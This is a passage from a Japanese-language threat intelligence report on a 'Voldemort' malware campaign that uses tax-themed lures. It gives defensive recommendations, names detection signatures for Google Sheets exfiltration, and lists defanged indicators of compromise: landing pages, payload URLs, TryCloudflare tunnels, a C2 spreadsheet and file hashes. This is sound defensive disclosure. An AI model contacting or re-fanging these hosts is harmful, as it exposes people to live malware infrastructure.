この掻動はスパむ掻動ず䞀臎しおいるように芋えたすが、この脅嚁クラスタヌに関連する今埌の掻動によっお、この評䟡が倉わる可胜性もありたす。その堎合、サむバヌ犯眪行為者は、兞型的な電子犯眪の配信特性をいく぀か瀺す䞀方で、珟圚運営者だけが利甚可胜で、広範なキャンペヌンでは悪甚されおいない珍しい機胜を備えたカスタマむズされたマルりェアを䜿甚し、たた、金銭的動機に基づくキャンペヌンでは通垞芋られない非垞に特殊な暙的を蚭定しおいたこずになりたす。

芳察された行動に察する防埡には、倖郚ファむル共有サヌビスぞのアクセスを既知のセヌフリスト察象サヌバヌのみに制限するこず、TryCloudflareぞのネットワヌク接続が業務䞊必芁ない堎合はブロックするこず、スクリプトでのsearch-msの䜿甚や、LNKやPowerShellの実行などの䞍審な埌続行動を監芖しお譊告するこずなどが含たれたす。

プルヌフポむント瀟は、本レポヌトに掲茉されおいるサヌビスを悪甚した行為に぀いお、サむバヌセキュリティ業界の同業ベンダヌに情報提䟛しおいたす。

 

Emerging Threats シグネチャ 

2857963 - ETPRO HUNTING GoogleSheets API V4 Activity (Fetch Single Cell with A1 Notation)  

2857964 - ETPRO HUNTING GoogleSheets API V4 Response (Single Cell with UUID)  

2857976 - ETPRO HUNTING GoogleSheets API V4 Activity (Possible Exfil)  

2858210 - ETPRO MALWARE Voldemort System Info Exfil  

IoC (Indicators of compromise / 䟵害指暙) 

Indicator 

Description 

First Observed 

hxxps://pubs[.]infinityfreeapp[.]com/SA150_Notes_2024[.]html 

Redirect Target / Landing Page 

2024-08-12 

hxxps://pubs[.]infinityfreeapp[.]com/IRS_P966[.]html 

Redirect Target / Landing Page 

2024-08-06 

hxxps://pubs[.]infinityfreeapp[.]com/Notice_pour_remplir_la_N%C2%B0_2044[.]html 

Redirect Target / Landing Page 

2024-08-13 

hxxps://pubs[.]infinityfreeapp[.]com/La_dichiarazione_precompilata_2024[.]html 

Redirect Target / Landing Page 

2024-08-05 

hxxps://pubs[.]infinityfreeapp[.]com/Steuerratgeber[.]html 

Redirect Target / Landing Page 

2024-08-13 

hxxps://od[.]lk/s/OTRfNzQ5NjQwOTJf/test[.]png 

Python Payload (Renamed ZIP containing Voldemort) 

2024-08-05 

hxxps://od[.]lk/s/OTRfODQ1Njk2ODVf/2044_4765[.]pdf 

Python Payload (Decoy PDFs) 

2024-08-05 

hxxps://od[.]lk/s/OTRfODM5Mzc3NjFf/irs-p966[.]pdf 

Python Payload (Decoy PDFs) 

2024-08-06 

hxxps://od[.]lk/s/OTRfODM3MjM2NzVf/La_dichiarazione_precompilata_2024[.]pdf 

Python Payload (Decoy PDFs) 

2024-08-05 

hxxps://od[.]lk/s/OTRfODQ1NDc2MjZf/SA150_Notes_2024[.]pdf 

Python Payload (Decoy PDFs) 

2024-08-12 

hxxps://od[.]lk/s/OTRfODQ1NzA0Mjlf/einzelfragen_steuerbescheinigungen_de[.]pdf 

Python Payload (Decoy PDFs) 

2024-08-13 

hxxp://83[.]147[.]243[.]18/p/ 

pingb.in base URL 

2024-08-05 

3fce52d29d40daf60e582b8054e5a6227a55370bed83c662a8ff2857b55f4cea 

test.png/zip SHA256  

2024-08-05 

561e15a46f474255fda693afd644c8674912df495bada726dbe7565eae2284fb 

CiscoSparkLauncher.dll SHA256 (Voldemort Malware) 

2024-08-05 

6bdd51dfa47d1a960459019a960950d3415f0f276a740017301735b858019728 

CiscoCollabHost.exe SHA256 (Benign file used for side-loading) 

2024-08-05 

pants-graphs-optics-worse[.]trycloudflare[.]com 

TryCloudflare Tunnel Hostname 

2024-08-05 

ways-sms-pmc-shareholders[.]trycloudflare[.]com 

TryCloudflare Tunnel Hostname 

2024-08-05 

recall-addressed-who-collector[.]trycloudflare[.]com 

TryCloudflare Tunnel Hostname 

2024-08-05 

hxxps://sheets[.]googleapis[.]com:443/v4/spreadsheets/16JvcER-0TVQDimWV56syk91IMCYXOvZbW4GTnb947eE/ 

Voldemort C2 

2024-08-05 

hxxps://resource[.]infinityfreeapp[.]com/ABC_of_Tax[.]html 

Redirect Target / Landing Page 

2024-08-19 

hxxps://resource[.]infinityfreeapp[.]com/0023012-317[.]html 

Redirect Target / Landing Page 

2024-08-19 

hxxps://od[.]lk/s/OTRfODQ4ODE4OThf/logo[.]png 

Python Payload (Renamed ZIP containing Voldemort) 

2024-08-19 

hxxps://od[.]lk/s/OTRfODQ5MzQ5Mzlf/ABC_of_Tax[.]pdf 

Python Payload (Decoy PDFs) 

2024-08-19 

0b3235db7e8154dd1b23c3bed96b6126d73d24769af634825d400d3d4fe8ddb9 

logo.png/zip SHA256 

 

2024-08-19 

fa383eac2bf9ad3ef889e6118a28aa57a8a8e6b5224ecdf78dcffc5225ee4e1f 

CiscoSparkLauncher.dll Hash (Voldemort Malware) 

2024-08-19 

invasion-prisoners-inns-aging[.]trycloudflare[.]com 

TryCloudflare Tunnel Hostname 

2024-08-19